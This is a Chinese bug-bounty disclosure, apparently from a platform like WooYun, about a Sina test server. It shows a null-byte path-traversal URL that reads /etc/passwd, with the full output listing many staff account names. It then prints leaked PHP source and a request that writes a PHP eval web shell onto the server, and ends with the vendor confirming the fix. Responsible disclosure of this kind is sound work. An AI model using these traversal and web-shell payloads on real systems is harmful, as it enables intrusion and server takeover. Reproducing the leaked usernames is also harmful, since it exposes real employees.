2015-01-12: 细节已通知厂商并且等待厂商处理中 2015-01-12: 厂商已经确认,细节仅向厂商公开 2015-01-22: 细节向核心白帽子及相关领域专家公开 2015-02-01: 细节向普通白帽子公开 2015-02-11: 细节向实习白帽子公开 2015-02-26: 细节向公众公开
RT
首先从一个看似很蛋疼的页面开始说起http://123.125.106.97/test/data.php 这是个啥?
嗯,他教我要传入两个参数。
please input 'date=&type='
随便传入两个值发现是下载xls,经验告诉我,date这个参数很有可能是拼接然后读文件,于是有了
http://123.125.106.97/test/data.php?date=../../../../../../../../../../../../../../../../etc/passwd%00&type=../../../../../../../../../../../../../../../../etc/passwd%00
果然是读文件
root:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologinsync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/haltmail:x:8:12:mail:/var/spool/mail:/sbin/nologinnews:x:9:13:news:/etc/news:uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologinoperator:x:11:0:operator:/root:/sbin/nologingames:x:12:100:games:/usr/games:/sbin/nologingopher:x:13:30:gopher:/var/gopher:/sbin/nologinftp:x:14:50:FTP User:/var/ftp:/sbin/nologinnobody:x:99:99:Nobody:/:/sbin/nologinnscd:x:28:28:NSCD Daemon:/:/sbin/nologinvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologinpcap:x:77:77::/var/arpwatch:/sbin/nologinoprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologinntp:x:38:38::/etc/ntp:/sbin/nologinsysmon:x:60422:60422::/nonexistent:/nologinsshd:x:500:500::/home/sshd:/sbin/nologindbus:x:81:81:System message bus:/:/sbin/nologinavahi:x:70:70:Avahi daemon:/:/sbin/nologinrpc:x:32:32:Portmapper RPC user:/:/sbin/nologinmailnull:x:47:47::/var/spool/mqueue:/sbin/nologinsmmsp:x:51:51::/var/spool/mqueue:/sbin/nologinxfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologinrpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologinnfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologinhaldaemon:x:68:68:HAL daemon:/:/sbin/nologinavahi-autoipd:x:100:104:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologinsabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologinlibin1:x:502:502::/usr/home/libin1:/bin/bashjunhai:x:503:503::/usr/home/junhai:/bin/bashqingming:x:504:504::/usr/home/qingming:/bin/bashliyuan:x:505:505::/usr/home/liyuan:/bin/bashhangang:x:507:507::/usr/home/hangang:/bin/bashwangshuo:x:508:508::/usr/home/wangshuo:/bin/bashgenlei:x:509:509::/usr/home/genlei:/bin/bashxiaoyue1:x:514:514::/usr/home/xiaoyue1:/bin/bashpengjie:x:520:520::/usr/home/pengjie:/bin/bashtaohui:x:528:528::/usr/home/taohui:/bin/bashyuli3:x:533:533::/usr/home/yuli3:/bin/bashsearch:x:536:536::/usr/home/search:/sbin/nologinxueyun:x:537:537::/usr/home/xueyun:/bin/bashjianqing:x:540:540::/usr/home/jianqing:/bin/bashhongwei6:x:542:542::/usr/home/hongwei6:/bin/bashwuhua1:x:543:543::/usr/home/wuhua1:/bin/bashmysql:x:545:545::/usr/home/mysql:/sbin/nologinxiaolong:x:547:547::/usr/home/xiaolong:/bin/bashqixing:x:548:548::/usr/home/qixing:/bin/bashliuxin4:x:549:549::/usr/home/liuxin4:/bin/bashzhuhuan:x:550:550::/usr/home/zhuhuan:/bin/bashzhongqin:x:551:551::/usr/home/zhongqin:/bin/bashleilei3:x:552:552::/usr/home/leilei3:/bin/bashyajun:x:554:554::/usr/home/yajun:/bin/bashdalong1:x:556:556::/usr/home/dalong1:/bin/bashkaijun1:x:557:557::/usr/home/kaijun1:/bin/bashzhenqiang1:x:561:561::/usr/home/zhenqiang1:/bin/bashjinqiang:x:565:565::/usr/home/jinqiang:/bin/bashrdsup_api:x:567:567::/usr/home/rdsup_api:/bin/bashchenyang:x:568:568::/usr/home/chenyang:/bin/bashshukui1:x:569:569::/usr/home/shukui1:/bin/bashbangjian:x:572:572::/usr/home/bangjian:/bin/bashkaiwei3:x:574:574::/usr/home/kaiwei3:/bin/bashmaqian:x:576:576::/usr/home/maqian:/bin/bashguochao3:x:578:578::/usr/home/guochao3:/bin/bashxiaofeng6:x:580:580::/usr/home/xiaofeng6:/bin/bashxiaodong2:x:581:581::/usr/home/xiaodong2:/bin/bashwb_liukai:x:582:582::/usr/home/wb_liukai:/bin/bashwb_guorui:x:583:583::/usr/home/wb_guorui:/bin/bashwb_zhuoyue:x:584:584::/usr/home/wb_zhuoyue:/bin/bashhean:x:585:585::/usr/home/hean:/bin/bashzhuxing:x:588:588::/usr/home/zhuxing:/bin/bashxingdong:x:589:589::/usr/home/xingdong:/bin/bashpuppet:x:52:52:Puppet:/var/lib/puppet:/sbin/nologinhongkai1:x:590:590::/usr/home/hongkai1:/bin/bashbaohua:x:591:591::/usr/home/baohua:/bin/bashtangkai:x:592:592::/usr/home/tangkai:/bin/bash
然后,然后猜路径读php源代码啊,嗯,猜到了
http://123.125.106.97/test/data.php?date=../../../../test/data.php%00&type=1关键是这个文件../../../../test/tmpls.php
159-163行
... }else if($mod == 'tmpsave'){ $data = $_REQUEST['data']; saveTmpl($filename, $data, $url); return; }else if($mod == 'down'){...
saveTmpl可疑的函数,8成屎写文件的,继续下代码看,头部include了一个文件require_once('include/tmpl_func.php');
<?php require_once("Settings.php");if(!extension_loaded("curl"))@dl("curl.so"); function crawl($url){ $request = curl_init(); if (!$request) { return -1; } if (!curl_setopt($request, CURLOPT_URL, $url)) { return -2; } if (!curl_setopt($request, CURLOPT_RETURNTRANSFER, true)){ return -3; } if (!curl_setopt($request, CURLOPT_TIMEOUT, 15)){ return -4; } if (!curl_setopt($request, CURLOPT_ENCODING, 'gzip,deflate')){ return -5; } if (!curl_setopt($request, CURLOPT_USERAGENT, 'SinaWeiboBot')) { return -6; } $response = curl_exec($request); if (!$response) { return -7; } return $response; } /* *页面编码纠正 */ function judgeCharset($html){ $head = $html->find('head'); $head = current($head); $meta = $head->find('meta'); for($i=0; $i<count($meta);$i++){ $one = $meta[$i]; //content="text/html; charset=utf-8" $charset = strtolower($one->getAttribute('content')); list($type, $code) = explode(";", $charset); echo $charset; if(strpos($code, "utf-8") >0 || strpos($code, "utf8") >0){ $one->setAttribute('content', "text/html; charset=gbk"); return true; } } return false; } function getUrlContent(&$url){ $content = crawl($url); if(strpos($content, '</head>') === false){ $content = str_replace('<body>', '</head><body>', $content); } if(is_utf8($content)) return "utf8"; else return "gbk"; /* if(IsUTF8($content)){ $content = iconv('utf-8', 'gbk//ignore', $content); $arr = array("charset=utf-8" => "charset=gbk"); $content = strtr($content,$arr); } */ return $content; } /** * 取得网页内容 * * @param string $url * @return string */ function getUrlContent2(&$url){ $http = array('http'=>array('method'=>'GET', 'timeout'=>1, 'user_agent'=>"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 QQDownload/1.7", 'header'=>"Accept-Language: zh-cn,zh;q=0.5")); $content = @file_get_contents($url, false, stream_context_create($http)); if(strpos($http_response_header[0], '404') !== false)return false; if(!$content){ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_HTTPHEADER, array("User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 QQDownload/1.7", "Accept-Language: zh-cn,zh;q=0.5")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $content = curl_exec($ch); curl_close($ch); } if(IsUTF8($content)) $content = iconv('utf-8', 'gbk//ignore', $content); if(strpos($content, '</head>') === false) $content = str_replace('<body>', '</head><body>', $content); return $content; } /** *读取配置 * *@param String $line *@return array() if is section ,return array(section), if is entry, return array(entry, value) */ function readConfig($line){ $line = trim($line); //解析section if(strpos($line, '[') == 0 && strrpos($line, ']') == (strlen($line) - 1)){ return array(substr($line, 1, strlen($line) - 2)); }else{ //解析value $pos = strpos($line, '='); if($pos > 0){ $entry = trim(substr($line, 0, $pos)); $value = trim(substr($line, $pos+1)); return array($entry, $value); } } return array(); } /** * 读取模板配置文件 * * @param String $filename * @return Array */ function parseTmpl($filename){ if(!file_exists($filename))return false; $tmpl = new Settings_INI(); $ret = $tmpl->load($filename); /* $typeRet = array(); foreach($ret as $section=>$entrys){ //如果是以special开头的,则提取后面的名字 $key = substr($section, strlen("special-")); foreach($entrys as $entry => $value){ if(strcmp($entry, "GENERAL") == 0){ $typeRet[$key]['score'] = $value; }else if(strcmp($entry, "WEIGHT") == 0){ $typeRet[$key]['weight'] = $value; } else if(strcmp($entry, "TEMPLATE") == 0){ $typeRet[$key]['tmpl'] = $value; } } } */ return $ret; } function parseTmpl2($filename){ if(!file_exists($filename))return false; $content = file_get_contents($filename); $content = iconv('gbk', 'utf-8//ignore', $content); $lines = preg_split('/\r\n|\n|\r/', $content, -1, PREG_SPLIT_NO_EMPTY); $data = array(); $count = count($lines); for($i = 0; $i < $count; $i ++){ $line = $lines[$i]; if(strpos($line, ':') === false)continue; list($key, $val) = explode(':', $line); if(strpos($key, '#list') === 0){ //解析list $t = explode('|', $key); $name = $t[1]; $path = $val; $data['list'][$path]['name'] = $name; $line = $lines[++$i]; while($i < $count && $line != '#endlist'){ list($k, $v) = explode(':', $line); $data['list'][$path]['content'][$k] = $v; $line = $lines[++$i]; } if($i == $count)return false; //没找到结束标签 }else $data[$key] = $val; } return $data; } /** * 保存模板到配置文件中 * */ function saveTmpl($filename, $data, $url, $flag = true){ if($flag){ $array = json_decode($data, true); }else $array = $data; if(!$array)return false; //初始化common信息 if(!$array['common']){ $array['common']['REGISTER_URL'] = $url; $array['common']['REGISTER_ID'] = md5($url); $array['common']['REGISTER_TOP'] = 5; }else{ if(!$array['common']['REGISTER_URL']) $array['common']['REGISTER_URL'] = $url; if(!$array['common']['REGISTER_ID']) $array['common']['REGISTER_ID'] = md5($url); if(!$array['common']['REGISTER_TOP']) $array['common']['REGISTER_TOP'] = 5; } $fpFile =fopen($filename, "w"); if(!$fpFile) { echo "write $filename error.<br/>"; return false; } foreach($array as $section=>$entrys){ fprintf($fpFile,"[%s]\n", $section); foreach($entrys as $entry=>$value){ fprintf($fpFile,"%s = %s\n", $entry, $value); } } fclose($fpFile); return true; } /**检测站点模板是否存在 **/ function existed_tmpl($CONFIG, $site){ $path = $CONFIG['tmpl']['TEMPLATE_PATH']; if(!file_exists($path)) return false; //看是否有该站点的模板 //模板命名为$domain.$urlmd5.tmpl if(!preg_match('/http:\/\/([^\/]+)/', $site, $matches)) { return false; } $domain = $matches[1]; $urlmd5 = md5($site); $filename = "$path/$domain.$urlmd5.tmpl"; if(!file_exists($filename)) return false; return true; } function saveTmpl2($filename, $data){ $array = json_decode($data, true); if(!$array)return false; $str = ""; foreach ($array as $key=>$val){ if($key == 'list')continue; $str .= "$key:$val\r\n"; } if(isset($array['list'])){ foreach ($array['list'] as $key=>$val){ $s = ''; $name = $val['name']; $val = $val['content']; foreach ($val as $k=>$v){ $s .= "$k:$v\r\n"; } if(!empty($s)) $str .= "\r\n#list|$name:$key\r\n$s#endlist\r\n"; } } $str = iconv('utf-8', 'gbk//ignore', $str); file_put_contents($filename, $str); return true; } /** *从生成的html节点下读取页面编码格式 */ function getContentCode($html){ } /** * 处理节点,给每一个有文字的节点添加onmouseover,onmouseout,onclick属性 * * @param DOMNode $node */ function dealNode22($node){ $length = count($node->nodes); //对每个节点移除所有的事件 $node->removeAttribute("onmouseover"); $node->removeAttribute("onmouseout"); $node->removeAttribute("onclick"); if($length == 0){ $flag = false; if(trim($node->text())) $flag = true; else if($node->tag == 'img') $flag = true; if($flag){ if($node->tag == 'text') $node = $node->parent(); $excludeTags = array('text', 'script', 'style', 'head', 'body', 'iframe', 'input', 'select', 'textarea'); if(!in_array($node->tag, $excludeTags)){ $node->setAttribute('onmouseover', "mouseover(event)"); $node->setAttribute('onmouseout', "mouseout(event)"); $node->setAttribute('onclick', 'return mouseclick(event)'); } if($node->tag == 'a'){ $node->setAttribute("href", "javascript:void(0)"); $node->setAttribute("target", "_self"); } } }else{ foreach ($node->nodes as $n) dealNode22($n); } } function dealNode($node){ $length = count($node->nodes); $flag = false; if(trim($node->text())) $flag = true; if($flag && $length ==0 ){ $excludeTags = array('text', 'script', 'style', 'head', 'body', 'iframe', 'input', 'select','textarea'); if($node->tag == 'text' || $node->tag == 'img') $node = $node->parent(); if(!in_array($node->tag, $excludeTags)){ if($node->getAttribute('onmouseover') || $node->getAttribute('onclick')) return; $node->setAttribute('onmouseover', "mouseover(event)"); $node->setAttribute('onmouseout', "mouseout(event)"); $node->setAttribute('onclick', 'return mouseclick(event)'); } if($node->tag == 'a'){ $node->setAttribute("href", "javascript:void(0)"); $node->setAttribute("target", "_self"); } } if($length != 0){ foreach ($node->nodes as $n) dealNode($n); } } ?>
嗯,那么构造一个url传shell
http://123.125.106.97/test/tmpls.php?url=http://www.sina.php%00;123&mod=tmpsave&data={"<?php @eval($_POST[wy123]);?>":123}&common=1
上传成功:http://123.125.106.97/test/tmpls/www.sina.php
罚钱,这个要
危害等级:高
漏洞Rank:10
确认时间:2015-01-12 11:03
感谢关注新浪安全,漏洞修复中。
暂无